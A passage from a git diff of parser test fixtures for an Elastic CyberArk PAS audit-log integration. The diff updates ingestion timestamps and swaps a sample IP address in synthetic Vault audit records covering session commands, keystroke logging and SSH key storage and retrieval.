Title\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.5\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\",\"IsoTimestamp\":\"2021-03-16T17:11:42Z\",\"Message\":\"Window Title\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "411", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json index 5c4538a35d8..51effe33ff9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json @@ -101,7 +101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:35.222280400Z", + "ingested": "2021-12-09T13:37:04.279820500Z", "original": "\u003c5\u003e1 2021-03-25T11:29:37Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 07:29:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T11:29:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e412\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eMSSQL\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MSSql-epmsvr01.cybr.com-sa\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SHOW DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MSSql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"sa\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"tgtsvr01.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"master\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580240\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011980\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SQL;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 07:29:37\",\"IsoTimestamp\":\"2021-03-25T11:29:37Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"412\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"MSSQL\",\"File\":\"Root\\\\Database-MSSql-epmsvr01.cybr.com-sa\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SHOW DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MSSql\"},{\"Name\":\"UserName\",\"Value\":\"sa\"},{\"Name\":\"Address\",\"Value\":\"tgtsvr01.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"master\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580240\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011980\"},{\"Name\":\"Tags\",\"Value\":\"SQL;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "412", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json index 5fd65175940..6c06eebed5b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json @@ -93,7 +93,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:35.266376100Z", + "ingested": "2021-12-09T13:37:04.451006400Z", "original": "\u003c5\u003e1 2021-03-25T10:04:06Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 06:04:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T10:04:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e414\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux SSH Keys\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-rhel7.cybr.com-firecall1\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eVerificationPeriod\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall1;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616666646\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1582315464\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 06:04:06\",\"IsoTimestamp\":\"2021-03-25T10:04:06Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"414\",\"Desc\":\"CPM Verify SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux SSH Keys\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-rhel7.cybr.com-firecall1\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"VerificationPeriod\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall1;\",\"Message\":\"CPM Verify SSH Key\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"firecall1\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"SequenceID\",\"Value\":\"2\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616666646\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1582315464\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "414", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log index 8c7361274f6..e8abd4c0395 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log @@ -1 +1 @@ -<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json index 165ca01a18a..57f90fa6c94 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json @@ -28,7 +28,7 @@ }, "@timestamp": "2021-03-11T16:50:17.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -44,11 +44,11 @@ "severity": "Info", "iso_timestamp": "2021-03-11T16:50:17Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e427\u003c/MessageID\u003e\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e427\u003c/MessageID\u003e\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Store SSH Key", "issuer": "Administrator", "rfc5424": true, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Store SSH Key", @@ -62,8 +62,8 @@ "event": { "severity": 2, "action": "store ssh key", - "ingested": "2021-06-09T10:24:35.310803700Z", - "original": "\u003c5\u003e1 2021-03-11T16:50:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e427\u003c/MessageID\u003e\\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:17\",\"IsoTimestamp\":\"2021-03-11T16:50:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"427\",\"Desc\":\"Store SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store SSH Key\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:37:04.617241200Z", + "original": "\u003c5\u003e1 2021-03-11T16:50:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e427\u003c/MessageID\u003e\\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:17\",\"IsoTimestamp\":\"2021-03-11T16:50:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"427\",\"Desc\":\"Store SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store SSH Key\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "427", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log index 1420d0a428e..b51cf1be1ff 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log @@ -1,3 +1,3 @@ -<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 